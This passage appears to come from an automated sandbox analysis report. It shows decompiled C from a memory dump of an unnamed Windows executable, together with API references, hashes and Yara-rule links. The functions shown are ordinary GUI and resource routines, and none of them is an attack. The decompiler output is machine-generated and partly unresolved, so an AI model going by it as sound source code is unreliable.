					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E00453450(_t36, 0);
						E00455828( *((intOrPtr*)(_t51 + 0x44)));
					}
					E00457D14(_t51);
					_t21 =  *0x48fc00; // 0x21d0f1c
					_t55 =  *((intOrPtr*)(_t21 + 0x64));
					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
						_t21 = SetFocus(E0043F370(_t55));
					}
					if( *((short*)(_t51 + 0x10a)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x108))();
					}
				}
				return _t21;
			}

0x004586a2
0x004586a8
0x004586af
0x004586b9
0x004586c2
0x004586fc
0x00458704
0x004586d3
0x004586e1
0x004586e3
0x00000000
0x004586e5
0x004586e5
0x004586e7
0x004586ec
0x004586f4
0x004586f5
0x004586f5
0x004586e3
0x00458711
0x0045871a
0x0045871c
0x0045871e
0x0045871e
0x00458724
0x0045872d
0x0045872f
0x00458731
0x00458731
0x0045873b
0x00458740
0x00458745
0x00458758
0x00458760
0x00458760
0x00458767
0x0045876c
0x00458771
0x00458776
0x00458780
0x00458780
0x0045878d
0x00000000
0x00458797
0x0045878d
0x0045879f

APIs

IsIconic.USER32 ref: 004586A8
SetActiveWindow.USER32(?,?,?,?,004580EA,00000000,0045858C), ref: 004586B9
IsWindowEnabled.USER32(00000000), ref: 004586DC
NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,004580EA,00000000,0045858C), ref: 004586F5
SetWindowPos.USER32(?,00000000,00000000,?,?,004580EA,00000000,0045858C), ref: 0045873B
SetFocus.USER32(00000000,?,00000000,00000000,?,?,004580EA,00000000,0045858C), ref: 00458780

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnabledFocusIconicNtdllProc_
String ID:
API String ID: 3996302123-0
Opcode ID: 27c15484ce4297f41ceb425cb8bb680fe46c224e471e1b033c15d14073fefb49
Instruction ID: 8af15a2fc43c48f92a1ec54e0d953763b45cd33a6a55fa418cb509a55d460a25
Opcode Fuzzy Hash: 27c15484ce4297f41ceb425cb8bb680fe46c224e471e1b033c15d14073fefb49
Instruction Fuzzy Hash: 3331D1707142409BEB14AB69DD85B6A27986F04705F18047AFD00EF2D7DE7CE848875D

Uniqueness

Uniqueness Score: -1.00%

Function 0043ED9C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0043ED9C(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E0043F674(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E0043F674(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E0043865C(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E00438310(_t52);
						return E004037B0(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}

0x0043eda5
0x0043eda7
0x0043eda9
0x0043edae
0x0043edc9
0x0043edd2
0x0043ee00
0x0043ee00
0x0043ee03
0x0043ee09
0x0043ee0f
0x0043ee14
0x0043ee19
0x0043ee1b
0x0043ee1d
0x0043ee2f
0x0043ee39
0x0043ee44
0x0043ee45
0x0043ee46
0x0043ee47
0x0043ee53
0x0043ee53
0x0043ee58
0x0043ee5a
0x00000000
0x0043ee65
0x0043eddb
0x0043ede0
0x0043ede2
0x00000000
0x00000000
0x0043edf9
0x00000000
0x0043edbd
0x0043edbd
0x0043edc3
0x0043ee70
0x0043ee70
0x00000000
0x0043edc3

APIs

IsIconic.USER32 ref: 0043EDDB
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0043EDF9
GetWindowPlacement.USER32(?,0000002C), ref: 0043EE2F
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0043EE53

Strings

,, xrefs: 0043EE1D

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: 1e4a3a49f1a6b957df08a9d5391cf862449ffda888c5111ff213619f2a4f8f9d
Instruction ID: b34c0b2983a170d4d7faa89c5c5bfc29622552f7847272a02c6992c659ba1bbe
Opcode Fuzzy Hash: 1e4a3a49f1a6b957df08a9d5391cf862449ffda888c5111ff213619f2a4f8f9d
Instruction Fuzzy Hash: 7B213871600204ABCF54EF5AD8C5ADA77A8AF0D314F04547AFD14EF386D675DD048BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004585F0, Relevance: 7.6, APIs: 5, Instructions: 59
nativewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004585F0(void* __eax) {
				int _t21;
				struct HWND__* _t36;
				void* _t40;

				_t40 = __eax;
				_t1 = _t40 + 0x30; // 0x0
				_t21 = IsIconic( *_t1);
				if(_t21 == 0) {
					E00457D04();
					_t2 = _t40 + 0x30; // 0x0
					SetActiveWindow( *_t2);
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0043F370( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t15 = _t40 + 0x30; // 0x0
						_t21 = E00457698( *_t15, 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						_t36 = E0043F370( *((intOrPtr*)(_t40 + 0x44)));
						_t13 = _t40 + 0x30; // 0x0
						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t14 = _t40 + 0x30; // 0x0
						_t21 =  *_t14;
						_push(_t21);
						L00406D08();
					}
					if( *((short*)(_t40 + 0x102)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x100))();
					}
				}
				return _t21;
			}

0x004585f2
0x004585f4
0x004585f8
0x004585ff
0x00458607
0x0045860c
0x00458610
0x00458619
0x0045867d
0x00458680
0x0045863c
0x00458640
0x00458652
0x00458658
0x0045865c
0x00458661
0x00458663
0x00458668
0x0045866d
0x0045866d
0x00458670
0x00458671
0x00458671
0x0045868d
0x00000000
0x00458697
0x0045868d
0x0045869f

APIs

IsIconic.USER32 ref: 004585F8
SetActiveWindow.USER32(00000000,00000000,?,?,00458C88), ref: 00458610
IsWindowEnabled.USER32(00000000), ref: 00458633
SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,00458C88), ref: 0045865C
NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 00458671

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnabledIconicNtdllProc_
String ID:
API String ID: 1720852555-0
Opcode ID: 71a836c6cafcf50dc1dce313330eaed78997b95cbf3755771a93046c6f3efe6e
Instruction ID: 06e9175cf1c7f32ff4e542ee7d7a7b1df9cadbeded7b9642034c1a4e261fd295
Opcode Fuzzy Hash: 71a836c6cafcf50dc1dce313330eaed78997b95cbf3755771a93046c6f3efe6e
Instruction Fuzzy Hash: CC11D3716002009BDB54EF69D9C6B5637A8AF04305F08147AFE45EF297DA79EC888758

Uniqueness

Uniqueness Score: -1.00%

Function 00426BA4, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00426BA4(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x48fabd != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E00426B14( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x48fa98; // 0x426ba4
				 *0x48fa98 = E004269A4(1, _t19, _t21, __edi, _t23);
				return  *0x48fa98(_t23, _t19);
			}

0x00426bac
0x00426baf
0x00426bb9
0x00426be3
0x00426bf4
0x00426c07
0x00426bf6
0x00426bfb
0x00426bfb
0x00000000
0x00426c11
0x00000000
0x00426be5
0x00426bc0
0x00426bcd
0x00000000

Strings

MonitorFromWindow, xrefs: 00426BBB

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID: MonitorFromWindow
API String ID: 190572456-2842599566
Opcode ID: 1506d851f635075fd03fe839fcda1bb51d4943d6d9e81413673e2fb30f42dc65
Instruction ID: ad68316b27f70c4d8fdb2f21b7f2b593686ec712c708b88c350b3d109f0b6f20
Opcode Fuzzy Hash: 1506d851f635075fd03fe839fcda1bb51d4943d6d9e81413673e2fb30f42dc65
Instruction Fuzzy Hash: 9301DF717040386A8700EB92AC819BF735CDB01314B91047BED55D7641DB3C990587AD

Uniqueness

Uniqueness Score: -1.00%

Function 0045BDA0, Relevance: 6.2, APIs: 4, Instructions: 163
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0045BDA0(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v268;
				char _v508;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _t75;
				intOrPtr _t91;
				char* _t97;
				signed int _t107;
				signed int _t114;
				intOrPtr _t121;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t146;
				int _t152;
				intOrPtr _t153;
				void* _t163;
				void* _t164;
				intOrPtr _t165;

				_t163 = _t164;
				_t165 = _t164 + 0xfffffde4;
				_v544 = 0;
				_v540 = 0;
				_v536 = 0;
				_v532 = 0;
				_v528 = 0;
				_t133 = __edx;
				_v8 = __eax;
				_push(_t163);
				_push(0x45c000);
				_push( *[fs:eax]);
				 *[fs:eax] = _t165;
				if(__edx >= 1) {
					E0045B868(_v8,  &_v528);
					if(E0040A964(_v528, _t133) == 1) {
						_t133 = _t133 - 1;
					}
				}
				_v12 = _t133;
				if(E0045BB80(_v8) == 0) {
					__eflags = _v12;
					if(_v12 < 0) {
						__eflags = 0;
						_v12 = 0;
					}
					E0045B868(_v8,  &_v540);
					_t75 = E004045D8(_v540);
					__eflags = _t75 - _v12;
					if(_t75 <= _v12) {
						E0045B868(_v8,  &_v544);
						_v12 = E004045D8(_v544);
					}
					E0045BD7C(_v8, _v12, _v12);
					goto L21;
				} else {
					if(_v12 < 0) {
						_v12 = 0;
					}
					_t135 = _v12 + 1;
					E0045B868(_v8,  &_v532);
					if(_t135 < E004045D8(_v532)) {
						E0045B868(_v8,  &_v536);
						asm("bt [edx], eax");
						if(( *(_v536 + _t135 - 1) & 0x000000ff) < 0) {
							_t135 = _t135 + 1;
						}
					}
					_t24 = _v8 + 0x228; // 0x366855c0
					_t91 =  *_t24;
					if(_t91 <= _v12) {
						_v12 = _t91;
						_t135 = _v12;
					}
					E0045BD7C(_v8, _t135, _t135);
					if(_t135 == _v12) {
						 *((intOrPtr*)(_v8 + 0x230)) = _v12;
						L21:
						__eflags = 0;
						_pop(_t146);
						 *[fs:eax] = _t146;
						_push(0x45c007);
						return E00404344( &_v544, 5);
					} else {
						GetKeyboardState( &_v268);
						_t152 = 0x100;
						_t97 =  &_v524;
						do {
							 *_t97 = 0;
							_t97 = _t97 + 1;
							_t152 = _t152 - 1;
							_t177 = _t152;
						} while (_t152 != 0);
						_v508 = 0x81;
						 *((char*)(_t163 + ( *(0x471c44 + (E004037B0(_v8, _t177) & 0x0000007f) * 2) & 0x0000ffff) - 0x208)) = 0x81;
						SetKeyboardState( &_v524);
						 *((char*)(_v8 + 0x23c)) = 1;
						_push(_t163);
						_push(0x45bf6e);
						_push( *[fs:eax]);
						 *[fs:eax] = _t165;
						_t107 = E004037B0(_v8, _t177);
						SendMessageA(E0043F370(_v8), 0x100,  *(0x471c44 + (_t107 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_t114 = E004037B0(_v8, _t177);
						SendMessageA(E0043F370(_v8), 0x101,  *(0x471c44 + (_t114 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_pop(_t153);
						 *[fs:eax] = _t153;
						_push(0x45bf75);
						_t121 = _v8;
						 *((char*)(_t121 + 0x23c)) = 0;
						return _t121;
					}
				}
			}

0x0045bda1
0x0045bda3
0x0045bdad
0x0045bdb3
0x0045bdb9
0x0045bdbf
0x0045bdc5
0x0045bdcb
0x0045bdcd
0x0045bdd2
0x0045bdd3
0x0045bdd8
0x0045bddb
0x0045bde1
0x0045bdec
0x0045be00
0x0045be02
0x0045be02
0x0045be00
0x0045be03
0x0045be10
0x0045bf8f
0x0045bf93
0x0045bf95
0x0045bf97
0x0045bf97
0x0045bfa3
0x0045bfae
0x0045bfb3
0x0045bfb6
0x0045bfc1
0x0045bfd1
0x0045bfd1
0x0045bfdd
0x00000000
0x0045be16
0x0045be1a
0x0045be1e
0x0045be1e
0x0045be24
0x0045be2e
0x0045be40
0x0045be4b
0x0045be65
0x0045be68
0x0045be6a
0x0045be6a
0x0045be68
0x0045be6e
0x0045be6e
0x0045be77
0x0045be79
0x0045be7c
0x0045be7c
0x0045be86
0x0045be8e
0x0045bf87
0x0045bfe2
0x0045bfe2
0x0045bfe4
0x0045bfe7
0x0045bfea
0x0045bfff
0x0045be94
0x0045be9b
0x0045bea0
0x0045bea5
0x0045beab
0x0045beab
0x0045beae
0x0045beaf
0x0045beaf
0x0045beaf
0x0045beb2
0x0045bed0
0x0045bedf
0x0045bee7
0x0045bef0
0x0045bef1
0x0045bef6
0x0045bef9
0x0045bf05
0x0045bf24
0x0045bf32
0x0045bf51
0x0045bf58
0x0045bf5b
0x0045bf5e
0x0045bf63
0x0045bf66
0x0045bf6d
0x0045bf6d
0x0045be8e

APIs

GetKeyboardState.USER32(?,00000000,0045C000), ref: 0045BE9B
SetKeyboardState.USER32(00000081), ref: 0045BEDF
SendMessageA.USER32(00000000,00000100,00000000,00000001), ref: 0045BF24
SendMessageA.USER32(00000000,00000101,00000000,00000001), ref: 0045BF51

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: KeyboardMessageSendState
String ID:
API String ID: 1999190242-0
Opcode ID: b4217af07094c55ecbd976ae125b8c178fdf7f3afcd6a3f811cffb544f4c981f
Instruction ID: 23adf5d4f7e529b058c66d1fba4eb5591ab85889e37c0514321d0d6710f047e4
Opcode Fuzzy Hash: b4217af07094c55ecbd976ae125b8c178fdf7f3afcd6a3f811cffb544f4c981f
Instruction Fuzzy Hash: DE6140749006089FCB10EF69C886ADDB7B4EB59305F6045EAE844E7392D7386E84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00416D64, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00416D64(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E00416CF4(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x416b04
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E00416CF4(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x416b04
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x416630
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E00416AC4(_t23, _t25, _t18);
			}

0x00416d6b
0x00416d6e
0x00416d70
0x00416d80
0x00416d82
0x00416d85
0x00416d87
0x00416d8a
0x00416d8f
0x00416d8f
0x00416d90
0x00416d9a
0x00416d9c
0x00416d9f
0x00416da1
0x00416da4
0x00416da9
0x00416daa
0x00416db4
0x00416db5
0x00416db9
0x00416dc2
0x00416dcd

APIs

FindResourceA.KERNEL32(?,?,?), ref: 00416D7B
LoadResource.KERNEL32(?,00416B04,?,?,?,004122D8,?,00000001,00000000,?,00416CD4,?), ref: 00416D95
SizeofResource.KERNEL32(?,00416B04,?,00416B04,?,?,?,004122D8,?,00000001,00000000,?,00416CD4,?), ref: 00416DAF
LockResource.KERNEL32(00416630,00000000,?,00416B04,?,00416B04,?,?,?,004122D8,?,00000001,00000000,?,00416CD4,?), ref: 00416DB9

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 2545eb823e597b0ef761e8e65bfbd6e12f6e5d90b9f745f036ca9c39330fd95c
Instruction ID: 7a047066e4020fb3ec365297d1a117ace91cb6e4aebfddfd9ce2b1495baa0238
Opcode Fuzzy Hash: 2545eb823e597b0ef761e8e65bfbd6e12f6e5d90b9f745f036ca9c39330fd95c
Instruction Fuzzy Hash: 98F0ADB36052006F8B04EF5DA881D9B73ECEE88264316006FFD08D7202DA38ED1083B8

Uniqueness

Uniqueness Score: -1.00%

Function 0043372C, Relevance: 6.0, APIs: 4, Instructions: 46
sleepCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0043372C(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x4337a9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E00433178(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E00432DD0(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E004047D0(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x4337b0);
				return E00404320( &_v8);
			}

0x0043372f
0x00433733
0x00433737
0x00433738
0x0043373d
0x00433740
0x00433745
0x0043374f
0x00433751
0x00433753
0x0043375f
0x0043376d
0x00433776
0x0043377f
0x0043378e
0x0043378e
0x00433795
0x00433798
0x0043379b
0x004337a8

APIs

Part of subcall function 00433178: WinHelpA.USER32 ref: 00433187

GetTickCount.KERNEL32 ref: 0043374A
Sleep.KERNEL32(00000000,00000000,004337A9,?,?,00000000,00000000,?,0043371F), ref: 00433753
GetTickCount.KERNEL32 ref: 00433758
WinHelpA.USER32 ref: 0043378E

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CountHelpTick$Sleep
String ID:
API String ID: 2438605093-0
Opcode ID: a9943fa7b5c6a1866caac57e232b25b3193c51454412981fe94a60469e8aea57
Instruction ID: 8accd2dc7a28ac9191b1abc83bbd48f8ecd30135b0fd31469ffce50d41439bbb
Opcode Fuzzy Hash: a9943fa7b5c6a1866caac57e232b25b3193c51454412981fe94a60469e8aea57
Instruction Fuzzy Hash: D001A2B0600204AFE711EBA6DD42B1DB3A8DB4D709F61507BF500E6AC1DB7CAE048559

Uniqueness

Uniqueness Score: -1.00%

Function 0043CE20, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0043CE20(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				intOrPtr* _t65;
				intOrPtr* _t67;
				void* _t68;

				_t67 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t68 = _t17 - 0x84;
				if(_t68 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E00439460(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						return E00439F70(_t50, _t67);
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E0043CD8C(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E0043F674(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t67 + 8)));
						_push( *((intOrPtr*)(_t67 + 4)));
						_push( *_t67);
						_t32 = E0043F370(_t50);
						_push(_t32);
						L00406D08();
						return _t32;
					}
					goto L27;
				}
				if(_t68 == 0) {
					_t21 = E00439F70(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E00407260( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E00438800(_t50,  &_v28,  &_v20);
					_t21 = E0043CCF8(_t50, 0,  &_v28, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t67 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t65 = E004500B0(__eax);
					if(_t65 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t65 + 0xe4))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E0043F370(__eax);
						if(_t45 == GetCapture() &&  *0x471990 != 0) {
							_t47 =  *0x471990; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x471990; // 0x0
								E00439EA4(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}

0x0043ce26
0x0043ce28
0x0043ce2a
0x0043ce2c
0x0043ce31
0x0043ce50
0x0043ce53
0x0043cf30
0x0043cf37
0x0043cf82
0x0043cf82
0x0043cf82
0x0043cf73
0x00000000
0x0043cf77
0x0043ce61
0x0043cefa
0x0043cf01
0x00000000
0x00000000
0x0043cf07
0x00000000
0x00000000
0x0043cf0b
0x0043cf12
0x00000000
0x00000000
0x0043cf17
0x0043cf1b
0x0043cf1e
0x0043cf21
0x0043cf26
0x0043cf27
0x00000000
0x0043cf27
0x00000000
0x0043ce67
0x0043ce33
0x0043cea9
0x0043ceb2
0x00000000
0x00000000
0x0043cec1
0x0043ced0
0x0043cedd
0x0043cee4
0x00000000
0x00000000
0x0043ceea
0x00000000
0x0043ceea
0x0043ce35
0x0043ce38
0x0043ce73
0x0043ce77
0x00000000
0x00000000
0x0043ce83
0x0043ce8b
0x00000000
0x00000000
0x00000000
0x0043ce91
0x0043ce3a
0x0043ce3b
0x0043ce9a
0x00000000
0x00000000
0x0043ce3d
0x0043ce40
0x0043cf3d
0x0043cf4b
0x0043cf56
0x0043cf5e
0x0043cf69
0x0043cf6e
0x0043cf6e
0x0043cf5e
0x0043cf4b
0x0043ce40

APIs

GetCapture.USER32 ref: 0043CF44

Strings

, xrefs: 0043CE96

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Capture
String ID:
API String ID: 1145282425-3916222277
Opcode ID: 2a1b0f335cfb047a4e136eb7a30ad2bf1dc10676cf6e92bdf0c91ebf052f28ad
Instruction ID: 43acd932db1cddca358a2b5833d55645959fd90ebcfa15af3ebc567744cec2f9
